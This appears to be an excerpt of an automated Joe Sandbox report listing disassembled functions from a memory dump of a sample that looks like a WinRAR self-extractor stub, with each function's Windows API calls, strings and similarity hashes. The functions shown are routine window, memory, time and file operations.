SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B8CDED
DeleteObject.GDI32(00000000), ref: 00B8CDF4
GetWindow.USER32(00000000,00000002), ref: 00B8CDFD

Strings

STATIC, xrefs: 00B8CD83

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: a41aaac19643d82946d0c4b05ac6a1a76df5ce3eb5dbf174cb855f87cc1d5f1f
Instruction ID: 47b1669fe67da755c90788ed4246a458bdba063097c9f761c0bb40888039c77d
Opcode Fuzzy Hash: a41aaac19643d82946d0c4b05ac6a1a76df5ce3eb5dbf174cb855f87cc1d5f1f
Instruction Fuzzy Hash: 4311D8725426517BE7217B60DC09FAF7BDCEB55742F008462FA42A20B1EE748905D7B4

Function 00B98EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B98EC5

Part of subcall function 00B984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?), ref: 00B984F4
Part of subcall function 00B984DE: GetLastError.KERNEL32(?,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?,?), ref: 00B98506

_free.LIBCMT ref: 00B98ED1
_free.LIBCMT ref: 00B98EDC
_free.LIBCMT ref: 00B98EE7
_free.LIBCMT ref: 00B98EF2
_free.LIBCMT ref: 00B98EFD
_free.LIBCMT ref: 00B98F08
_free.LIBCMT ref: 00B98F13
_free.LIBCMT ref: 00B98F1E
_free.LIBCMT ref: 00B98F2C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 32e9fd78d03f6ccaae1bf2dd238413320efdc4c5cec9eedb960d5bcd32762806
Instruction ID: d9121205fe492bf7d5ed3175a5c155eef580351cdeba4026a09e7cc94f18e266
Opcode Fuzzy Hash: 32e9fd78d03f6ccaae1bf2dd238413320efdc4c5cec9eedb960d5bcd32762806
Instruction Fuzzy Hash: FF11A27650010DAFDF11EF94C842CDA3BA6FF06350B5280F5BA088B726DA31EA519B90

Function 00B72162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

;%u, xrefs: 00B72497
xc%u, xrefs: 00B726D7
x%u, xrefs: 00B7267A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: fa96bb77b5ad6edaebdb3ab0c907b22e6d0c788979a10dac833ec3f277dfe557
Instruction ID: 461ae2b98af1392061f418006c6955fc6dd5a9f9ead659f9cf667c3a35cf9fd6
Opcode Fuzzy Hash: fa96bb77b5ad6edaebdb3ab0c907b22e6d0c788979a10dac833ec3f277dfe557
Instruction Fuzzy Hash: 54F106716042405BDB15EF2889D5BAA7BD9AB90300F08C5EDFDAD9B283DB24DD48C762

Function 00B8ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7130B: GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
Part of subcall function 00B7130B: SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

EndDialog.USER32(?,00000001), ref: 00B8AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B8AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B8AD60
SetWindowTextW.USER32(?,?), ref: 00B8AD71
GetDlgItem.USER32(?,00000065), ref: 00B8AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B8AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B8ADA4

Strings

LICENSEDLG, xrefs: 00B8ACE4

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: a84953c84bb8ad6795bef802f8a865158c3b49ab9ba2e1957d47c7d3fd0652d1
Instruction ID: c420c8db73d57bd35ecc80b39e487317cab550f6560603600029a63848fd9a15
Opcode Fuzzy Hash: a84953c84bb8ad6795bef802f8a865158c3b49ab9ba2e1957d47c7d3fd0652d1
Instruction Fuzzy Hash: F321B432241105BBE2216F21ED59E3B7FECEB5AB46F014066F604E34B0EE62A900D732

Function 00B79443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B79448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B7946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B7948A

Part of subcall function 00B817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B7BB05,00000000,.exe,?,?,00000800,?,?,00B885DF,?), ref: 00B817C2

_swprintf.LIBCMT ref: 00B79526

Part of subcall function 00B7400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B7401D

MoveFileW.KERNEL32(?,?), ref: 00B79595
MoveFileW.KERNEL32(?,?), ref: 00B795D5

Strings

rtmp%d, xrefs: 00B7950F

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 9093a816064e2dfd46bd1c10c364500bb4dc9af54b136bfae6a455cbcd826fc1
Instruction ID: c520bb1bb64a27d1d3d61cf633cc62d07366b29f9dc0de847c7120b3dc65f32a
Opcode Fuzzy Hash: 9093a816064e2dfd46bd1c10c364500bb4dc9af54b136bfae6a455cbcd826fc1
Instruction Fuzzy Hash: 2C415C71900258A6DF30EBA48C85EEE73FCEF51780F0485E5B56DA3052EB748B89CB64

Function 00B88E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00B88F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B88F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00B88F80

Strings

utf-8"></head>, xrefs: 00B88EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00B88EB2
</html>, xrefs: 00B88F0A
<html>, xrefs: 00B88EA7, 00B88EE0

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: da51eaf1b3e0e049fac3a065848c2be7cddce00cce1c50eceb653ed069760093
Instruction ID: 7f9ae93cb7b0d83ed8452718ec042ce7f268b17e99d3b47b78b843beb4ca4e83
Opcode Fuzzy Hash: da51eaf1b3e0e049fac3a065848c2be7cddce00cce1c50eceb653ed069760093
Instruction Fuzzy Hash: AE3128315483116BDB25BB349C02FAF7BE8DF96720F4405AEF901A71E1EF649A09C3A5

Function 00B80A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00B80A9D

Part of subcall function 00B7ACF5: GetVersionExW.KERNEL32(?), ref: 00B7AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B80AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B80AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B80AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B80AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B80B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B80B3D
__aullrem.LIBCMT ref: 00B80BCB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 616fcdb1e24abb45d3df97ef7793e75eccd638ba3f5b4e4907be392a1143a83f
Instruction ID: 4766a23a37e41ad0d41269ed16d6797afddf0dac22307ae9a66166b2015c85a5
Opcode Fuzzy Hash: 616fcdb1e24abb45d3df97ef7793e75eccd638ba3f5b4e4907be392a1143a83f
Instruction Fuzzy Hash: 88413AB1408306AFC350EF64C88196BF7F8FF88754F004A6EF59692650E779E548CB51

Function 00B9EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B9F5A2,?,00000000,?,00000000,00000000), ref: 00B9EE6F
__fassign.LIBCMT ref: 00B9EEEA
__fassign.LIBCMT ref: 00B9EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B9EF2B
WriteFile.KERNEL32(?,?,00000000,00B9F5A2,00000000,?,?,?,?,?,?,?,?,?,00B9F5A2,?), ref: 00B9EF4A
WriteFile.KERNEL32(?,?,00000001,00B9F5A2,00000000,?,?,?,?,?,?,?,?,?,00B9F5A2,?), ref: 00B9EF83

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: f143d40fbab02874c180fc78c60ec62b32aa2835541f58c8b1cef79450d5c38b
Instruction ID: 89d29ab107e8733f49849be0cff89fc7124b403e92ae6e0fb25a943b48fa982e
Opcode Fuzzy Hash: f143d40fbab02874c180fc78c60ec62b32aa2835541f58c8b1cef79450d5c38b
Instruction Fuzzy Hash: 9F519271A00209AFDF10CFA8D885BEEBBF9EF09310F14456AE565E7291E731E940CB60

Function 00B8C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00B8C54A
_swprintf.LIBCMT ref: 00B8C57E

Part of subcall function 00B7400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B7401D

SetDlgItemTextW.USER32(?,00000066,00BB946A), ref: 00B8C59E
_wcschr.LIBVCRUNTIME ref: 00B8C5D1
EndDialog.USER32(?,00000001), ref: 00B8C6B2

Strings

%s%s%u, xrefs: 00B8C573

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 44ceedd3151d5ef984eecb870b05ad1d6ce4c3c1e56f934cc75fc0e1ded94101
Instruction ID: 7989a724fa2da812cd02a1e19d1f8ab9b15fcf7cb2c1fb2cc987859ad1c486c7
Opcode Fuzzy Hash: 44ceedd3151d5ef984eecb870b05ad1d6ce4c3c1e56f934cc75fc0e1ded94101
Instruction Fuzzy Hash: 3D414FB1D00618AADF25EBA4DC45EEA7BFCEB18705F0040E6E509E7171EB719A84CB60

Function 00B89635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00B8964E
GetWindowRect.USER32(?,00000000), ref: 00B89693
ShowWindow.USER32(?,00000005,00000000), ref: 00B8972A
SetWindowTextW.USER32(?,00000000), ref: 00B89732
ShowWindow.USER32(00000000,00000005), ref: 00B89748

Strings

RarHtmlClassName, xrefs: 00B896F4

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 2d8b6953e5fc2c59c327f4df8b12df1475a305c77f624b76a7dc7a8220a2d640
Instruction ID: f54b512c092d553ae147d218a4f7bdf4ad76036254cea07d008c7c4b03285ff6
Opcode Fuzzy Hash: 2d8b6953e5fc2c59c327f4df8b12df1475a305c77f624b76a7dc7a8220a2d640
Instruction Fuzzy Hash: 4931C331005210EFCF11AF64DC49B6BBFE8EF58701F09859AFE49AA162EB34D905CB61

Function 00B9BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B9BF79: _free.LIBCMT ref: 00B9BFA2

_free.LIBCMT ref: 00B9C003

Part of subcall function 00B984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?), ref: 00B984F4
Part of subcall function 00B984DE: GetLastError.KERNEL32(?,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?,?), ref: 00B98506

_free.LIBCMT ref: 00B9C00E
_free.LIBCMT ref: 00B9C019
_free.LIBCMT ref: 00B9C06D
_free.LIBCMT ref: 00B9C078
_free.LIBCMT ref: 00B9C083
_free.LIBCMT ref: 00B9C08E

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 07f080894eef54d7a5519459e8b3a2a1db7b07041eb0bc0130f220c6c39f6159
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: BB11E271540B04F6EE20BBB0DD4BFCBB7DD6F05700F4088B5B29D66662DB65F9048A90

Function 00B920CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B920C1,00B8FB12), ref: 00B920D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B920E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B920FF
SetLastError.KERNEL32(00000000,?,00B920C1,00B8FB12), ref: 00B92151

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d2657389c146b6d3f4283232af49a73b0663a77a8f36a3b0f7ab0f7965ef0614
Instruction ID: 8ca2385e63324e03552271acb80733de2256bf5e5e4836c3b026515c175a612e
Opcode Fuzzy Hash: d2657389c146b6d3f4283232af49a73b0663a77a8f36a3b0f7ab0f7965ef0614
Instruction Fuzzy Hash: 6901AC3254D3217EBF642BB9FC975162BC4EB13B747210BBAF620661F1EF518C119254

Function 00B8DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 00B8DCC9
KERNEL32.DLL, xrefs: 00B8DCB4
ReleaseSRWLockExclusive, xrefs: 00B8DCD9

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 56474e164b10c65ab7bc8ea068c1f7130788d17085f4a711fe22e8663078f545
Instruction ID: 437dbfb0d5ea594df696b49501ba7678343232e88c4bf7592340966fe826a94e
Opcode Fuzzy Hash: 56474e164b10c65ab7bc8ea068c1f7130788d17085f4a711fe22e8663078f545
Instruction Fuzzy Hash: 300128726622229B4F307F745C917AAA7D4EA4371272406FBE501D33B0EE91CC81DBA0

Function 00B98060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B9807E

Part of subcall function 00B984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?), ref: 00B984F4
Part of subcall function 00B984DE: GetLastError.KERNEL32(?,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?,?), ref: 00B98506

_free.LIBCMT ref: 00B98090
_free.LIBCMT ref: 00B980A3
_free.LIBCMT ref: 00B980B4
_free.LIBCMT ref: 00B980C5

Strings

X ~, xrefs: 00B98060, 00B9806F, 00B98084

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: X ~
API String ID: 776569668-3218595459
Opcode ID: 5cc9fb299f3683311c96e06bab67b063fa3974aca6305a2d8aac7cfa22363d62
Instruction ID: df31d55b883c1f9ae20d750bbdcdfaaa814a4bf42ba845cc0dd2e0c9af73397f
Opcode Fuzzy Hash: 5cc9fb299f3683311c96e06bab67b063fa3974aca6305a2d8aac7cfa22363d62
Instruction Fuzzy Hash: A3F0B474802110ABDB016F1DBC22405B7A2FB067203094AB7F01487B30EF32D4419FE1

Function 00B80CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00B80D0D

Part of subcall function 00B7ACF5: GetVersionExW.KERNEL32(?), ref: 00B7AD1A

LocalFileTimeToFileTime.KERNEL32(?,00B80CB8), ref: 00B80D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B80D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B80D56
SystemTimeToFileTime.KERNEL32(?,00B80CB8), ref: 00B80D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B80D72

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

